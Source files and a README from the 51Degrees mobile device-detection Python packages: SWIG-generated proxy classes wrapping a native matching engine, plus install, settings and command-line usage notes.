        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___bool__(self)
    def __len__(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___len__(self)
    # Python 2 slice protocol plus item access, all handled in C.
    def __getslice__(self, i, j):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___getslice__(self, i, j)
    def __setslice__(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___setslice__(self, *args)
    def __delslice__(self, i, j):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___delslice__(self, i, j)
    def __delitem__(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___delitem__(self, *args)
    def __getitem__(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___getitem__(self, *args)
    def __setitem__(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___setitem__(self, *args)
    def pop(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_pop(self)
    def append(self, x):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_append(self, x)
    # STL-style member functions mirrored from std::vector.
    def empty(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_empty(self)
    def size(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_size(self)
    def swap(self, v):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_swap(self, v)
    def begin(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_begin(self)
    def end(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_end(self)
    def rbegin(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_rbegin(self)
    def rend(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_rend(self)
    def clear(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_clear(self)
    def get_allocator(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_get_allocator(self)
    def pop_back(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_pop_back(self)
    def erase(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_erase(self, *args)
    def __init__(self, *args):
        # Attach the new C object to this proxy; on old SWIG layouts
        # self.this is a list-like that is appended to instead.
        this = _fiftyone_degrees_mobile_detector_v3_trie_wrapper.new_VectorString(*args)
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
    def push_back(self, x):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_push_back(self, x)
    def front(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_front(self)
    def back(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_back(self)
    def assign(self, n, x):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_assign(self, n, x)
    def resize(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_resize(self, *args)
    def insert(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_insert(self, *args)
    def reserve(self, n):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_reserve(self, n)
    def capacity(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_capacity(self)
    __swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_trie_wrapper.delete_VectorString
    def __del__(self):
        return None
# Register VectorString in _fiftyone_degrees_mobile_detector_v3_trie_wrapper:
_fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_swigregister(VectorString)
class Match(_object):
    """SWIG proxy for a detection Match result from the trie engine.

    Instances are produced by the C layer (e.g. via Provider.getMatch);
    there is no public constructor.  All methods delegate to the compiled
    extension module."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, Match, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, Match, name)
    def __init__(self, *args, **kwargs):
        raise AttributeError("No constructor defined")
    __repr__ = _swig_repr
    __swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_trie_wrapper.delete_Match
    def __del__(self):
        return None
    def getValues(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getValues(self, *args)
    def getValue(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getValue(self, *args)
    def getValueAsBool(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getValueAsBool(self, *args)
    def getValueAsInteger(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getValueAsInteger(self, *args)
    def getValueAsDouble(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getValueAsDouble(self, *args)
    def getDeviceId(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getDeviceId(self)
    def getRank(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getRank(self)
    def getDifference(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getDifference(self)
    def getMethod(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getMethod(self)
    def getUserAgent(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getUserAgent(self)
# Register Match in _fiftyone_degrees_mobile_detector_v3_trie_wrapper:
_fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_swigregister(Match)
class Provider(_object):
    """SWIG proxy for the underlying C++ Provider exposed by
    _fiftyone_degrees_mobile_detector_v3_trie_wrapper.  Every method is a
    thin delegation to the compiled extension module."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, Provider, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, Provider, name)
    __repr__ = _swig_repr
    __swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_trie_wrapper.delete_Provider
    def __del__(self):
        return None
    def getHttpHeaders(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getHttpHeaders(self)
    def getAvailableProperties(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getAvailableProperties(self)
    def getDataSetName(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getDataSetName(self)
    def getDataSetFormat(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getDataSetFormat(self)
    def getDataSetPublishedDate(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getDataSetPublishedDate(self)
    def getDataSetNextUpdateDate(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getDataSetNextUpdateDate(self)
    def getDataSetSignatureCount(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getDataSetSignatureCount(self)
    def getDataSetDeviceCombinations(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getDataSetDeviceCombinations(self)
    def getMatch(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getMatch(self, *args)
    def getMatchWithTolerances(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getMatchWithTolerances(self, *args)
    def getMatchJson(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getMatchJson(self, *args)
    def setDrift(self, drift):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_setDrift(self, drift)
    def setDifference(self, difference):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_setDifference(self, difference)
    def reloadFromFile(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_reloadFromFile(self)
    def reloadFromMemory(self, source, size):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_reloadFromMemory(self, source, size)
    def getIsThreadSafe(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getIsThreadSafe(self)
    def __init__(self, *args):
        # Attach the new C object to this proxy; on old SWIG layouts
        # self.this is a list-like that is appended to instead.
        this = _fiftyone_degrees_mobile_detector_v3_trie_wrapper.new_Provider(*args)
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
# Register Provider in _fiftyone_degrees_mobile_detector_v3_trie_wrapper:
_fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_swigregister(Provider)
# This file is compatible with both classic and new-style classes. | 51degrees-mobile-detector-v3-trie-wrapper | /51degrees-mobile-detector-v3-trie-wrapper-3.2.18.4.tar.gz/51degrees-mobile-detector-v3-trie-wrapper-3.2.18.4/FiftyOneDegrees/fiftyone_degrees_mobile_detector_v3_trie_wrapper.py | fiftyone_degrees_mobile_detector_v3_trie_wrapper.py |
|51degrees|
Device Detection Python API
51Degrees Mobile Detector is a server side mobile detection solution.
Changelog
====================
- Fixed a bug where an additional compile argument was causing compilation errors with clang.
- Updated the v3-trie-wrapper package to include the Lite Hash Trie data file.
- Updated Lite Pattern data file for November.
- Updated Lite Hash Trie data file for November.
General
========
Before you start matching user agents, you may wish to configure the solution to use a different database. You can easily generate a sample settings file by running the following command
$ 51degrees-mobile-detector settings > ~/51degrees-mobile-detector.settings.py
The core ``51degrees-mobile-detector`` is included as a dependency when installing either the ``51degrees-mobile-detector-v3-wrapper`` or ``51degrees-mobile-detector-v3-trie-wrapper`` packages.
During installation, a directory which contains your data file will be created in ``~/51Degrees``.
Settings
=========
General Settings
----------------
- ``DETECTION_METHOD`` (defaults to 'v3-wrapper'). Sets the preferred mobile device detection method. Available options are v3-wrapper (requires the 51degrees-mobile-detector-v3-wrapper package) and v3-trie-wrapper (requires the 51degrees-mobile-detector-v3-trie-wrapper package).
- ``PROPERTIES`` (defaults to ''). List of case-sensitive property names to be fetched on every device detection. Leave empty to fetch all available properties.
- ``LICENCE`` Your 51Degrees license key for enhanced device data. This is required if you want to set up the automatic 51degrees-mobile-detector-premium-pattern-wrapper package updates.
Trie Detector settings
-----------------------
- ``V3_TRIE_WRAPPER_DATABASE`` Location of the Hash Trie data file.
Pattern Detector settings
--------------------------
- ``V3_WRAPPER_DATABASE`` Location of the Pattern data file.
- ``CACHE_SIZE`` (defaults to 10000). Sets the size of the workset cache.
- ``POOL_SIZE`` (defaults to 20). Sets the size of the workset pool.
Usage Sharer Settings
----------------------
- ``USAGE_SHARER_ENABLED`` (defaults to True). Indicates if usage data should be shared with 51Degrees.com. We recommend leaving this value unchanged to ensure we're improving the performance and accuracy of the solution.
- Advanced usage sharer settings are detailed in your settings file.
Automatic Updates
------------------
If you want to set up automatic updates, add your license key to your settings and add the following command to your cron
$ 51degrees-mobile-detector update-premium-pattern-wrapper
NOTE: Currently auto updates are only available with our Pattern API.
Usage
======
Core
-----
By executing the following a useful help page will be displayed explaining basic usage.
$ 51degrees-mobile-detector
To check everything is set up correctly, try fetching a match with
$ 51degrees-mobile-detector match "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Mobile/9B176"
Examples
=========
Additional examples can be found on our GitHub_ repository.
User Support
============
If you have any issues please get in touch with our Support_ or open an issue on our GitHub_ repository.
.. |51degrees| image:: https://51degrees.com/DesktopModules/FiftyOne/Distributor/Logo.ashx?utm_source=github&utm_medium=repository&utm_content=readme_pattern&utm_campaign=python-open-source
:target: https://51degrees.com
.. _GitHub: https://github.com/51Degrees/Device-Detection/tree/master/python
.. _Support: support@51degrees.com
| 51degrees-mobile-detector-v3-wrapper | /51degrees-mobile-detector-v3-wrapper-3.2.18.4.tar.gz/51degrees-mobile-detector-v3-wrapper-3.2.18.4/README.rst | README.rst |
from sys import version_info as _swig_python_version_info
# SWIG-generated guard: the import helper below relies on importlib, so
# refuse to load on interpreters older than Python 2.7.
if _swig_python_version_info < (2, 7, 0):
    raise RuntimeError('Python 2.7 or later required')
def swig_import_helper():
    # Locate and import the compiled SWIG extension.  First try a
    # package-relative import (when this module is installed inside a
    # package); fall back to a top-level import for flat installs.
    import importlib
    pkg = __name__.rpartition('.')[0]
    mname = '.'.join((pkg, '_fiftyone_degrees_mobile_detector_v3_wrapper')).lstrip('.')
    try:
        return importlib.import_module(mname)
    except ImportError:
        return importlib.import_module('_fiftyone_degrees_mobile_detector_v3_wrapper')
# Bind the compiled extension once, then delete the helper and the version
# tuple so they do not leak into the module namespace.
_fiftyone_degrees_mobile_detector_v3_wrapper = swig_import_helper()
del swig_import_helper
del _swig_python_version_info
# Python 3 renamed __builtin__ to builtins; alias it for 2/3 compatibility.
try:
    import builtins as __builtin__
except ImportError:
    import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
    """Attribute setter shared by every SWIG proxy class in this module.

    Routes "thisown"/"this" to the underlying SwigPyObject, then tries a
    setter registered in __swig_setmethods__; otherwise stores the value
    directly (non-static mode) or refuses the new attribute (static mode).
    """
    if name == "thisown":
        return self.this.own(value)
    if name == "this":
        if type(value).__name__ == 'SwigPyObject':
            self.__dict__[name] = value
            return
    method = class_type.__swig_setmethods__.get(name, None)
    if method:
        return method(self, value)
    if not static:
        if _newclass:
            object.__setattr__(self, name, value)
        else:
            self.__dict__[name] = value
    else:
        raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
    # Non-static variant: unknown names are stored on the instance
    # instead of raising AttributeError.
    return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
    """Attribute getter shared by every SWIG proxy class in this module.

    "thisown" reports ownership of the wrapped C object; any other name
    must have a getter registered in __swig_getmethods__.
    """
    if name == "thisown":
        return self.this.own()
    method = class_type.__swig_getmethods__.get(name, None)
    if method:
        return method(self)
    raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
    # repr() shared by every SWIG proxy class: shows the proxied
    # SwigPyObject when one is attached, empty description otherwise.
    try:
        strthis = "proxy of " + self.this.__repr__()
    except __builtin__.Exception:
        strthis = ""
    return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
# SWIG compatibility shim: use new-style classes when the `object` builtin
# exists (always true on modern Pythons); _newclass records which mode the
# attribute helpers above should use.
try:
    _object = object
    _newclass = 1
except __builtin__.Exception:
    class _object:
        pass
    _newclass = 0
class SwigPyIterator(_object):
    """SWIG proxy for the C++ iterator used by the STL container wrappers.

    Abstract: instances come from the containers' iterator() methods and
    every operation delegates to the compiled extension module.
    """
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, SwigPyIterator, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, SwigPyIterator, name)
    def __init__(self, *args, **kwargs):
        raise AttributeError("No constructor defined - class is abstract")
    __repr__ = _swig_repr
    __swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_wrapper.delete_SwigPyIterator
    def __del__(self):
        return None
    def value(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_value(self)
    def incr(self, n=1):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_incr(self, n)
    def decr(self, n=1):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_decr(self, n)
    def distance(self, x):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_distance(self, x)
    def equal(self, x):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_equal(self, x)
    def copy(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_copy(self)
    # next/__next__ provided for both Python 2 and Python 3 iteration.
    def next(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_next(self)
    def __next__(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator___next__(self)
    def previous(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_previous(self)
    def advance(self, n):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_advance(self, n)
    def __eq__(self, x):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator___eq__(self, x)
    def __ne__(self, x):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator___ne__(self, x)
    def __iadd__(self, n):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator___iadd__(self, n)
    def __isub__(self, n):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator___isub__(self, n)
    def __add__(self, n):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator___add__(self, n)
    def __sub__(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator___sub__(self, *args)
    def __iter__(self):
        return self
# Register SwigPyIterator in _fiftyone_degrees_mobile_detector_v3_wrapper:
_fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_swigregister(SwigPyIterator)
class MapStringString(_object):
    """SWIG proxy for a C++ std::map<std::string, std::string>, exposing a
    Python dict-like interface.  All operations delegate to the compiled
    extension module."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, MapStringString, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, MapStringString, name)
    __repr__ = _swig_repr
    def iterator(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_iterator(self)
    def __iter__(self):
        return self.iterator()
    def __nonzero__(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString___nonzero__(self)
    def __bool__(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString___bool__(self)
    def __len__(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString___len__(self)
    # NOTE(review): __iter__ is emitted twice by the generator; this later
    # definition (key iteration, dict-like) is the one in effect.
    def __iter__(self):
        return self.key_iterator()
    def iterkeys(self):
        return self.key_iterator()
    def itervalues(self):
        return self.value_iterator()
    def iteritems(self):
        return self.iterator()
    def __getitem__(self, key):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString___getitem__(self, key)
    def __delitem__(self, key):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString___delitem__(self, key)
    def has_key(self, key):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_has_key(self, key)
    def keys(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_keys(self)
    def values(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_values(self)
    def items(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_items(self)
    def __contains__(self, key):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString___contains__(self, key)
    def key_iterator(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_key_iterator(self)
    def value_iterator(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_value_iterator(self)
    def __setitem__(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString___setitem__(self, *args)
    def asdict(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_asdict(self)
    def __init__(self, *args):
        # Attach the new C object to this proxy; on old SWIG layouts
        # self.this is a list-like that is appended to instead.
        this = _fiftyone_degrees_mobile_detector_v3_wrapper.new_MapStringString(*args)
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
    # STL-style member functions mirrored from std::map.
    def empty(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_empty(self)
    def size(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_size(self)
    def swap(self, v):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_swap(self, v)
    def begin(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_begin(self)
    def end(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_end(self)
    def rbegin(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_rbegin(self)
    def rend(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_rend(self)
    def clear(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_clear(self)
    def get_allocator(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_get_allocator(self)
    def count(self, x):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_count(self, x)
    def erase(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_erase(self, *args)
    def find(self, x):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_find(self, x)
    def lower_bound(self, x):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_lower_bound(self, x)
    def upper_bound(self, x):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_upper_bound(self, x)
    __swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_wrapper.delete_MapStringString
    def __del__(self):
        return None
# Register MapStringString in _fiftyone_degrees_mobile_detector_v3_wrapper:
_fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_swigregister(MapStringString)
class VectorString(_object):
    '''SWIG-generated proxy for a C++ std::vector<std::string>.
    The actual vector lives on the native side; every method below simply
    forwards to the matching C entry point in the
    _fiftyone_degrees_mobile_detector_v3_wrapper extension module.
    '''
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, VectorString, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, VectorString, name)
    __repr__ = _swig_repr
    # Python iteration / sequence protocol, backed by the C++ vector.
    def iterator(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_iterator(self)
    def __iter__(self):
        return self.iterator()
    def __nonzero__(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___nonzero__(self)
    def __bool__(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___bool__(self)
    def __len__(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___len__(self)
    def __getslice__(self, i, j):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___getslice__(self, i, j)
    def __setslice__(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___setslice__(self, *args)
    def __delslice__(self, i, j):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___delslice__(self, i, j)
    def __delitem__(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___delitem__(self, *args)
    def __getitem__(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___getitem__(self, *args)
    def __setitem__(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___setitem__(self, *args)
    # std::vector-style API mirrored on the Python side.
    def pop(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_pop(self)
    def append(self, x):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_append(self, x)
    def empty(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_empty(self)
    def size(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_size(self)
    def swap(self, v):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_swap(self, v)
    def begin(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_begin(self)
    def end(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_end(self)
    def rbegin(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_rbegin(self)
    def rend(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_rend(self)
    def clear(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_clear(self)
    def get_allocator(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_get_allocator(self)
    def pop_back(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_pop_back(self)
    def erase(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_erase(self, *args)
    def __init__(self, *args):
        # SWIG boilerplate: attach the newly created C++ object to this proxy.
        this = _fiftyone_degrees_mobile_detector_v3_wrapper.new_VectorString(*args)
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
    def push_back(self, x):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_push_back(self, x)
    def front(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_front(self)
    def back(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_back(self)
    def assign(self, n, x):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_assign(self, n, x)
    def resize(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_resize(self, *args)
    def insert(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_insert(self, *args)
    def reserve(self, n):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_reserve(self, n)
    def capacity(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_capacity(self)
    # Destruction of the native object is handled by SWIG via
    # __swig_destroy__; __del__ itself is deliberately a no-op.
    __swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_wrapper.delete_VectorString
    def __del__(self):
        return None
# Register VectorString in _fiftyone_degrees_mobile_detector_v3_wrapper:
_fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_swigregister(VectorString)
class Match(_object):
    '''SWIG-generated proxy for a single 51Degrees detection result.
    Exposes the matched property values (getValues/getValue) plus match
    metadata (device id, rank, difference, method, user agent); every call
    is forwarded to the native extension module.
    '''
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, Match, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, Match, name)
    def __init__(self, *args, **kwargs):
        # Instances are produced by the native side (e.g. Provider.getMatch);
        # direct construction from Python is disabled.
        raise AttributeError("No constructor defined")
    __repr__ = _swig_repr
    # Destruction of the native object is handled by SWIG via
    # __swig_destroy__; __del__ itself is deliberately a no-op.
    __swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_wrapper.delete_Match
    def __del__(self):
        return None
    def getValues(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Match_getValues(self, *args)
    def getValue(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Match_getValue(self, *args)
    def getDeviceId(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Match_getDeviceId(self)
    def getRank(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Match_getRank(self)
    def getDifference(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Match_getDifference(self)
    def getMethod(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Match_getMethod(self)
    def getUserAgent(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Match_getUserAgent(self)
# Register Match in _fiftyone_degrees_mobile_detector_v3_wrapper:
_fiftyone_degrees_mobile_detector_v3_wrapper.Match_swigregister(Match)
class Profiles(_object):
    '''SWIG-generated proxy over a collection of 51Degrees profiles.
    Presumably returned by Provider.findProfiles() -- verify against the
    native API.  All calls are forwarded to the extension module.
    '''
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, Profiles, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, Profiles, name)
    __repr__ = _swig_repr
    # Destruction of the native object is handled by SWIG via
    # __swig_destroy__; __del__ itself is deliberately a no-op.
    __swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_wrapper.delete_Profiles
    def __del__(self):
        return None
    def __init__(self):
        # SWIG boilerplate: attach the newly created C++ object to this proxy.
        this = _fiftyone_degrees_mobile_detector_v3_wrapper.new_Profiles()
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
    def getCount(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Profiles_getCount(self)
    def getProfileIndex(self, index):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Profiles_getProfileIndex(self, index)
    def getProfileId(self, index):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Profiles_getProfileId(self, index)
# Register Profiles in _fiftyone_degrees_mobile_detector_v3_wrapper:
_fiftyone_degrees_mobile_detector_v3_wrapper.Profiles_swigregister(Profiles)
class Provider(_object):
    '''SWIG-generated proxy for the native 51Degrees Provider.
    Exposes device detection (getMatch / getMatchJson / getMatchForDeviceId /
    findProfiles), data set metadata getters, cache statistics and data file
    reloading.  Every call is forwarded to the extension module.
    '''
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, Provider, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, Provider, name)
    __repr__ = _swig_repr
    # Destruction of the native object is handled by SWIG via
    # __swig_destroy__; __del__ itself is deliberately a no-op.
    __swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_wrapper.delete_Provider
    def __del__(self):
        return None
    def getHttpHeaders(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getHttpHeaders(self)
    def getAvailableProperties(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getAvailableProperties(self)
    def getDataSetName(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getDataSetName(self)
    def getDataSetFormat(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getDataSetFormat(self)
    def getDataSetPublishedDate(self):
